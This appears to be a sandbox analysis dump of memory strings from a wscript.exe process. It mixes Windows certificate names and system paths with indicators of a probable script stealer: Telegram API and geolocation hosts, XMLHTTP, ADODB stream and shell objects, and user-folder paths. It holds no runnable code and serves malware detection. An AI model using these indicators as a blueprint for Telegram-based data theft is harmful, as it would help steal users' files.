Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sha256'ygu%	memstr_d1101ad3-2
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ^y`u&	memstr_035943a4-a
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vsyyyu'	memstr_d544f6f2-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vpyru(	memstr_807badf0-3
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1n8jkyku)	memstr_ea97a68b-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bydu*	memstr_36c7dcb3-f
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: )}y]u+	memstr_ecfd3232-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windows rt verificationtyvu,	memstr_7e1d5361-d
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: `oy/u-	memstr_2ff3d7b3-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fy(u.	memstr_05202d98-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: yay!u/	memstr_84ba4729-d
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: encrypting file system	memstr_e7b09519-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: preview build signing	memstr_7083c42f-b
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: encryption algorithm	memstr_3770c5ee-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: server authentication	memstr_1e731877-a
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windows kits component	memstr_852837ee-b
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qualified subordination	memstr_0f9baed8-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: private key archival	memstr_1c6ea942-f
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: platform certificate	memstr_61457ad6-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windows tcb component	memstr_64cbacd5-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: client authentication	memstr_fea3a0b8-d
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ip security end system	memstr_0e6229cf-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: inhibit any policy]^~t	memstr_b3f60eb5-e
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: revoked list signerw^xt	memstr_a3c7fad7-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: root program flagsq^rt	memstr_2d6044ce-b
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sealing signaturek^lt	memstr_a406f63d-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: root list signery^zt	memstr_7c9aa44b-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ip security users^tt	memstr_462e6f0d-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sealing timestampm^.t	memstr_e8c2ae4e-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: key recovery agentg^(t	memstr_14f070fa-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lifetime signinga^"t	memstr_3988c30a-3
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: smart card log-on	memstr_9244ebfc-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: client information	memstr_61d85ddf-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: enterprise root oid	memstr_1fe9f388-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: jurisdiction hash	memstr_ab28719d-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft publisher	memstr_32b33b9b-b
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tpm specification	memstr_7be08104-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: document signing	memstr_0e933cb4-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kdc authentication	memstr_5d6d3b4e-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: key recovery agent	memstr_9107acdd-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: key pack licences	memstr_84b3bb78-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ds[_}t	memstr_005edef6-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $taa_ct	memstr_64898542-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $\ar_vt	memstr_85c72eb0-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $g_)t	memstr_58951149-d
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: iconresource	memstr_147a91f0-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\program files (x86)\microsoft onedrive\onedrive.exe,1	memstr_c7a7f44b-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: iconresourcec:\program files (x86)\microsoft onedrive\onedrive.exe,1	memstr_806ff437-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: jc:\windows\syswow64\wbem\wbemdisp.tlb	memstr_7debaa71-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\programdata\microsoft\windows\start menu	memstr_59bfb17c-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shell:::{018d5c66-4533-4307-9b53-224de2ed1fe6}	memstr_10af98de-f
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: <c:\windows\syswow64\scrrun.dll4si	memstr_53875074-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \user\appdata\roaming\microsoft	memstr_7a5737b7-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 481f-904-	memstr_59053250-3
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (non)standard marshaling for iwbemobjectsink41\	memstr_01313f18-3
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (non)standard marshaling for iwbemobjectsinkex"\fu	memstr_4dd21da9-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $row\yu	memstr_2d3a7147-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: h\lu	memstr_3683293b-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (non)standard marshaling for iwbemmultitargets}\_u	memstr_1f6c2808-d
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: `cwoxxi	memstr_c22a1277-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: >c:\windows\syswow64\stdole2.tlb	memstr_b7359c3b-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t ckm	memstr_bef8d658-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windows hardware driver attested verification	memstr_6fe63f51-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft unified security protocol provider	memstr_0145d7c4-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6-8kz	memstr_7b6069f5-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windows hardware driver extended verification8]	memstr_37b20d0a-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: embedded windows system component verification	memstr_40502757-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msxml2.serverxmlhttp_]bt	memstr_a9eb25eb-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wohti	memstr_93581975-d
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: su(th	memstr_aba588e1-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: woxxi	memstr_abb96c7f-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cbuxva	memstr_83462c7d-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cbuhta	memstr_460fcaa6-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.3.6.1.4.1.311.10.3.32	memstr_fc228706-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: https://api.telegram.org/	memstr_9f1406f0-f
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "1.3.6.1.4.1.311.10.3.34	memstr_e28488e9-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: !1.3.6.1.4.1.311.10.3.33	memstr_f20cafbf-f
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #1.3.6.1.4.1.311.10.3.35	memstr_4a74276d-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\mpr.dll	memstr_12f274b6-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wo wi	memstr_9dea12a0-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rng/b	memstr_5d48a279-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cbuhsa	memstr_cbad5fa5-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'bju	memstr_4a770efa-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sha1i	memstr_715ad422-b
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _bbu!	memstr_23cda8c2-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8ahsm	memstr_856e2597-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wbzu"	memstr_30fc464a-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft\windows\historyobru#	memstr_75969274-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lmem(	memstr_42f1835e-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :2023100320231004: lmem(4;h	memstr_6c0a03ae-b
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gbju$	memstr_ef034f9b-d
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ts service security package	memstr_c3bc570d-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wbzu&	memstr_44bc3293-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: schannel security packageobru'	memstr_bd44a54c-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gb*u(	memstr_5bac5b57-e
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: schannel security package	memstr_c475b6f8-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endorsement key verified	memstr_53ef6a94-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ahsm	memstr_12d28595-2
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8ahsm	memstr_0b917ab4-2
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pk=i0	memstr_cb3fb736-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: aeslookup.iolmem(d	memstr_e22d914b-d
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sha256	memstr_985e011c-3
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :2023100420231005: lmem(t;h	memstr_703b2f68-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sha256microsoft primitive providerx	memstr_69414f44-a
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bcryptprimitives.dll	memstr_686156df-2
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1ocdt	memstr_800e6bfe-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4ccxt	memstr_9fa6958c-a
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: iy@nu*	memstr_bd51c6ea-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?s@hu+	memstr_e77939d7-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @m@bu,	memstr_7831c105-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: <g@\|u-	memstr_e240a14c-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: aa@vu.	memstr_4b7c8666-d
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rsa-a	memstr_9d798119-3
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wscript.shellea{t	memstr_7bbdc1ab-b
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\public\desktop	memstr_8c209a50-2
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lrpc-269d65d60108622213	memstr_dc180d54-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wscript.shell	memstr_631c4796-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ncryptsslp.dll	memstr_30bab81b-3
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lrpc-269d65d60108622213/f	memstr_091773be-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lrpc-269d65d60108622213sf	memstr_70abeb78-3
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: }d"pn	memstr_24072ed5-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\desktop\|f	memstr_6485e64e-d
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: memory mapped cache mgrwfmu$	memstr_2bcce18e-a
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nffu%	memstr_fd27b6c3-2
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: memory mapped cache mgrif	memstr_02745fdb-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: `fxu'	memstr_a2921fdc-a
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\pictures	memstr_f1906b98-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\desktop.ini	memstr_5b95b761-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\videos	memstr_a1116428-3
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hj(5w<	memstr_1717ab7d-f
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cccoma_x64fre_en-gb_dv9	memstr_c5f57bf3-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\music	memstr_d875af09-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\fonts%g	memstr_efc0dc51-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rgjvi	memstr_bc6bc222-b
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mgcvj	memstr_9f8cbc63-a
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: <?dg\|vk	memstr_cca6fd07-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\onedrive	memstr_bfe0106d-e
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ]/qnn	memstr_0167183e-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b,gmd	memstr_7b63cc55-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avdnwm	memstr_b7c4c4f6-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z'qdgwn	memstr_d3a1960b-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hd`wo	memstr_1ac33ef3-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kcdyw	memstr_1f7c950d-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kcdywp	memstr_3889f06c-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: h5t[u	memstr_7acbb922-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ytr[^f"ghk	memstr_684770cd-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ytr[^f"ghke	memstr_684dcc04-d
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lrpc-559bf06f72796be679e	memstr_f564b046-b
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft kerberos v1.0$e	memstr_dda71cce-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntlm security package9qe	memstr_697ae0b1-3
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft unified security protocol providerhe	memstr_3e15bb3e-b
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ytr[^f"ghkce	memstr_bfac7659-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sha1microsoft primitive provider	memstr_904ccc2e-e
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: api.telegram.orghtep	memstr_255969aa-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rsamicrosoft primitive provider	memstr_486f01fa-a
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: keylength	memstr_cadba0db-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: feedplat:lmem	memstr_853b18d3-2
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: feedplatlmem	memstr_19a47139-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p;8j(t	memstr_224a0681-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o2j"t	memstr_3d462f6e-3
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o0pa]	memstr_71d583d6-e
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: json.geoiplookup.iobj	memstr_fd487dc9-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 19i0 b]	memstr_59f8cfdf-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: digest authentication for windowsiodj	memstr_7d4684f5-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gssapi)	memstr_d8401651-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9i@b(	memstr_44f2b460-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (assm	memstr_23ddac73-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: security manager	memstr_87d4c3b5-8
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k`hrk	memstr_ea0f97a8-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k`hrk0	memstr_66ec6ad7-e
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: <k,u5	memstr_9e79512a-b
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6k&u6	memstr_1c78ad34-a
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0k u7	memstr_25367e42-a
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: filesystem object*k:u8	memstr_fcdaff9d-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $k4u9	memstr_b43400b8-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: adodb.streamrk	memstr_ef4a7400-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: filesystem object@k	memstr_1ffba26a-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\systemhk	memstr_f5b071ea-f
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32	memstr_d5857a8a-7
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mycomputerfolder	memstr_a703c701-a
